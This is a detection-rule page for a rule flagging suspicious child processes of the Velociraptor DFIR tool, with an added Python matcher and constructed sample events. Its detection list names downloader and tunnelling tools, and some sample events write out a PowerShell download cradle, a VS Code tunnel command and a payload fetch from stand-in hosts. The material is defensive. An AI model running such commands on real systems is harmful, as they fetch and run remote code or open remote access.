Suspicious Velociraptor Child Process

Rule Info

Name: Suspicious Velociraptor Child Process
Author: Swachchhanda Shrawan Poudel (Nextron Systems)
Description: Detects the suspicious use of the Velociraptor DFIR tool to execute other tools or download additional payloads, as seen in a campaign in which it was abused for remote access and to stage further attacks.
Date: 2025-08-29
Modified: None
Id: 4bc90587-e6ca-4b41-be0b-ed4d04e4ed0c
Tags: attack.persistence, attack.defense-evasion, attack.t1219
Type: Community Rule
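The rule's own detection logic is not shown on this page. As an added illustration of the behaviour the description covers (Velociraptor spawning script interpreters, downloaders or a VS Code tunnel, the latter being what the PR title in the history below refers to), here is a small Python matcher run over constructed Sysmon-style process-creation events. This is example code, not the Sigma rule or Nextron's implementation; the parent-image check, the child-process list and the command-line markers are assumptions chosen to approximate the description, and the sample events are constructed.

```python
"""Approximate 'Velociraptor spawned something suspicious' over process-creation events.

Added example, not the Sigma rule's logic. The field names follow Sysmon Event ID 1
(Image, ParentImage, CommandLine); everything matched against is an assumption.
"""

# Assumed: child images a DFIR agent has no business launching during a normal collection.
SUSPICIOUS_CHILDREN = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "msiexec.exe",
    "curl.exe", "certutil.exe", "bitsadmin.exe",
    "code.exe",  # VS Code CLI; 'code tunnel' gives the operator remote access
}

# Assumed: command-line fragments that indicate a download or a tunnel being set up.
DOWNLOAD_MARKERS = (
    "http://", "https://", "downloadstring", "downloadfile",
    "invoke-webrequest", "-urlcache", "tunnel",
)

VELOCIRAPTOR_IMAGE = "velociraptor.exe"


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_suspicious(event: dict) -> bool:
    """True when Velociraptor is the parent and the child looks like tooling or a download."""
    if basename(event.get("ParentImage", "")) != VELOCIRAPTOR_IMAGE:
        return False
    child = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "").lower()
    return child in SUSPICIOUS_CHILDREN or any(m in cmdline for m in DOWNLOAD_MARKERS)


def detect(events: list[dict]) -> list[dict]:
    """Return the events that match."""
    return [e for e in events if is_suspicious(e)]


def detected_images(events: list[dict]) -> list[str]:
    """Child image basenames of the matching events, in input order."""
    return [basename(e["Image"]) for e in detect(events)]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {   # Velociraptor -> PowerShell cradle: should match
        "ParentImage": r"C:\Program Files\Velociraptor\Velociraptor.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -nop -w hidden -c IEX(New-Object Net.WebClient)"
                       ".DownloadString('http://example.invalid/a.ps1')",
    },
    {   # Velociraptor -> VS Code tunnel: should match
        "ParentImage": r"C:\Program Files\Velociraptor\Velociraptor.exe",
        "Image": r"C:\Users\Public\code.exe",
        "CommandLine": "code.exe tunnel --accept-server-license-terms --name host1",
    },
    {   # Velociraptor re-launching itself as a service: benign, should not match
        "ParentImage": r"C:\Program Files\Velociraptor\Velociraptor.exe",
        "Image": r"C:\Program Files\Velociraptor\Velociraptor.exe",
        "CommandLine": "Velociraptor.exe service run",
    },
    {   # PowerShell from Explorer: wrong parent, should not match
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -c Get-Date",
    },
    {   # Unknown binary but a URL on the command line: should match via marker
        "ParentImage": r"C:\Program Files\Velociraptor\Velociraptor.exe",
        "Image": r"C:\Tools\fetch.exe",
        "CommandLine": "fetch.exe --get https://example.invalid/stage2.bin",
    },
]

if __name__ == "__main__":
    for e in detect(SAMPLE_EVENTS):
        print("MATCH:", basename(e["Image"]), "<-", e["CommandLine"])
```

Velociraptor artifacts can legitimately spawn child processes during a collection, so in production this kind of match needs tuning against what your own collections run, and ideally a check that the parent binary sits in the path where you deployed the client; a Velociraptor client an attacker dropped into a user-writable directory is itself worth alerting on.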

Rule History

Author: Swachchhanda Shrawan Poudel
Title: Merge PR #5635 from @swachchhanda000 - velociraptor abusing vscode tunneling
Date: 2025-09-22
Commit: